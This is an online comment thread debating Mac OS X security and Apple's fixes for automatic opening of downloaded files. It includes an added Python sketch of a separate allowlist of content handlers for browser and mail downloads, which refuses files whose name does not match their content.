isn't this last week's news? didn't this discussion already happen? Anybody who's used Macs for a long period of time knows that they aren't 'safe.' But they are a HELL of a lot saf-er. amazing. it used to be 'Macs have no viruses because nobody uses them.' Now that it's widely agreed that they're pretty great and Xp is a royal pain to secure, it's 'see, I told you Macs aren't any better.' YES THEY ARE! and yes I use both.
As I predicted, Apple has merely patched the current incarnation of this flaw. It hasn't changed the flawed model of treating files as "safe".
As I noted the last time, there will be future exploits of this type until Apple takes the simple step of establishing a parallel registry of trusted programs, rather than trying (in vain) to achieve a balance between convenience and security using a single list of helpers and URI handlers for both local and untrusted content.
Ironically, the fix in 10.3.9 (do not open the content) is better than the fix in 10.4.5 (warn the user about the content).
Which security software company do you work for? Are you the author of the Leap exploit?
Jesus was a compassionate social conservative who called individuals to sin no more.
If I was working for an antivirus company I'd be happy Apple was starting to go down the Microsoft path, where there's so many security holes in the OS that the whole fundamentally broken approach of "antivirus" software is the only way to stay secure.
Automatic opening of untrusted content is a VERY dangerous operation, and if it is to be implemented at all it MUST be implemented using an interface that's dedicated to the execution of trusted handlers for that content.
Using LaunchServices or Windows Explorer when starting applications to open attachments or downloaded files is like passing CGI variables to programs using system(). The requirements for an API that's used by local applications to open local content are fundamentally different from those for an API used by applications handling untrusted content. Instead of trying to make sure that every local application is crippled and bound about with warnings and alerts, they should be implementing a locked down interface just for browsers, mail software, and so on...
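The parallel-registry design argued for in the comments above (a dedicated handler list for untrusted content, kept apart from the one local applications use), sketched as an added example that is not part of any post in this thread and is not Apple's code. The registry contents, application names and function names are all hypothetical, and the sample byte strings are constructed.

```python
# Added illustration; registry contents and application names are hypothetical.

# Registry consulted when the user opens a local file. Any installed
# application may add entries here, so it cannot be trusted for downloads.
LOCAL_HANDLERS = {
    "jpg": "ImageViewer",
    "zip": "ArchiveTool",
    "sh": "ShellRunner",
}

# Parallel registry consulted only by browsers and mail clients. It is a
# fixed allowlist keyed on the sniffed content type, never on the name.
UNTRUSTED_HANDLERS = {
    "image/jpeg": "ImageViewer",
    "application/pdf": "DocumentViewer",
}

# Leading bytes used to decide what a download really is.
MAGIC = (
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"%PDF-", "application/pdf"),
    (b"PK\x03\x04", "application/zip"),
    (b"#!", "text/x-script"),
)

# Content type that a file name claims through its extension.
CLAIMED = {
    "jpg": "image/jpeg",
    "jpeg": "image/jpeg",
    "pdf": "application/pdf",
    "zip": "application/zip",
}


def extension(name):
    """Return the lower-cased final extension, or '' if there is none."""
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def sniff(data):
    """Identify content by its leading bytes; unknown content gets None."""
    for prefix, ctype in MAGIC:
        if data.startswith(prefix):
            return ctype
    return None


def open_local(name):
    """Local open: look the extension up in the user-extensible registry."""
    return LOCAL_HANDLERS.get(extension(name))


def open_untrusted(name, data):
    """Decide what a browser or mail client may do with a download.

    Returns (action, handler): 'open' with an allowlisted handler,
    'save-only' for a recognised type that has no trusted handler, and
    'refuse' when name and content disagree or cannot be identified.
    """
    claimed = CLAIMED.get(extension(name))
    actual = sniff(data)
    if claimed is None or actual is None or claimed != actual:
        return ("refuse", None)
    handler = UNTRUSTED_HANDLERS.get(actual)
    if handler is None:
        return ("save-only", None)
    return ("open", handler)


# Constructed samples: a JPEG header, a script named like an image,
# and a ZIP archive header.
JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
DISGUISED = b"#!/bin/sh\necho constructed sample\n"
ZIP = b"PK\x03\x04" + b"\x00" * 16

if __name__ == "__main__":
    samples = (("photo.jpg", JPEG), ("photo.jpg", DISGUISED), ("notes.zip", ZIP))
    for name, data in samples:
        print(name, open_untrusted(name, data))
```

Because the untrusted path never reads `LOCAL_HANDLERS`, an application that registers itself for `jpg` changes what a local double-click does but not what a download is allowed to launch.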
an apple a day keeps the doctor (symantec) away.
i agree
Glad for the PR. I have a relative with an Apple and she had no idea how to check or protect her system. I think it's about time all Apple users take the initiative to protect their system and keep their anti-virus software up-to-date (and install it first!).